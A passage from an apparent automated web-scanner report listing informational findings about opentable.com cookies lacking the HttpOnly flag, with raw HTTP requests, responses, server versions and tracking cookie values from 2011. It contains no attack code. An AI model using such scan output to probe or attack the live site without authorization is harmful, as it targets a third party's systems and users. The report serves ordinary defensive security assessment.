Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+17%3a21%3a22&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100; lvCKE=tr=0&ts=0&g=06111003070951059795&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=qX3x6OJGnKP0oN40NSfL%2bw%3d%3d&ts=1&st=5; pgseq=; s_cc=true; s_nr=1317651710801-Repeat; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 14:21:29 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; expires=Sat, 03-Oct-1981 07:00:00 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+17%3a21%3a29&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100f310a61d67e345889bdb2fb7; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=qX3x6OJGnKP0oN40NSfL%2bw%3d%3d&ts=1&st=5&js=1; domain=.opentable.com; path=/
Set-Cookie: em=0; domain=.opentable.com; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Set-Cookie: pgseq=f310a61d96ec7771af33b2b9; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:29 GMT; path=/
Vary: Accept-Encoding
Content-Length: 54918


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><meta http-
...[SNIP]...
12.68. http://www.opentable.com/frontdoor/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /frontdoor/default.aspx?rid=90&restref=90&bgcolor=e3d4a4&titlecolor=000000&subtitlecolor=000000&btnbgimage=http://www.opentable.com/frontdoor/img/ot_btn_black.png&otlink=FFFFFF&icon=dark&mode=short HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 03 Oct 2011 12:53:35 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:53:35 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; domain=.opentable.com; path=/
Vary: Accept-Encoding
Content-Length: 64483

document.write("<link href=\"http://www.opentable.com/frontdoor/css/ot_short.css?v=Web_11_10_0_11.prod.com\" rel=\"styleSheet\" type=\"text/css\" /><!--[if IE]><link type=\"text/css\" href=\"http://ww
...[SNIP]...
12.69. http://www.opentable.com/info/aboutus.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /info/aboutus.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /info/aboutus.aspx HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; lvCKE=tr=0&ts=0&g=06111003070951059795&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; ftc=x=10%2f03%2f2011+17%3a21%3a29&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=qX3x6OJGnKP0oN40NSfL%2bw%3d%3d&ts=1&st=5&js=1; em=0; pgseq=; s_cc=true; s_nr=1317651726004-Repeat; s_sq=otrestref%3D%2526pid%253Dushome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.opentable.com%25252Finfo%25252Faboutus.aspx%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 14:21:38 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: restrefwhite=90; domain=.opentable.com; expires=Sat, 03-Oct-1981 07:00:00 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+17%3a21%3a38&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=100&rra=1; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 14:21:38 GMT; path=/
Vary: Accept-Encoding
Content-Length: 18801


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head><link href="/styles/Normal/ot_style003.css?ver=Web_11_10_0_
...[SNIP]...
12.70. http://www.opentable.com/interim.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /interim.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; pgseq=; ftc=x=10%2f03%2f2011+15%3a54%3a43&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:44 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-04
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:18-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=0&hr=http://www.grandcafe-sf.com/&tp=136; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Vary: Accept-Encoding
Content-Length: 5566


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head><meta http-equiv="content-type" content="text/html; chars
...[SNIP]...
12.71. http://www.opentable.com/jaspers-corner-tap-and-kitchen  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /jaspers-corner-tap-and-kitchen

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /jaspers-corner-tap-and-kitchen?rid=200&restref=200 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.kimptonhotels.com/restaurants/restaurant-reservations.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:50 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: restrefwhite=200; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&vbefres=1&vbefreg=1&js=0&m=4&restref=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&vbefres=1&vbefreg=1&js=0&m=4&restref=200; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: jslt=DhNUH7QEwV0b0tKkwEp2937edj1JsmX2; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Vary: Accept-Encoding
Content-Length: 199696


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns
...[SNIP]...
12.72. http://www.opentable.com/opentables.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:50 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
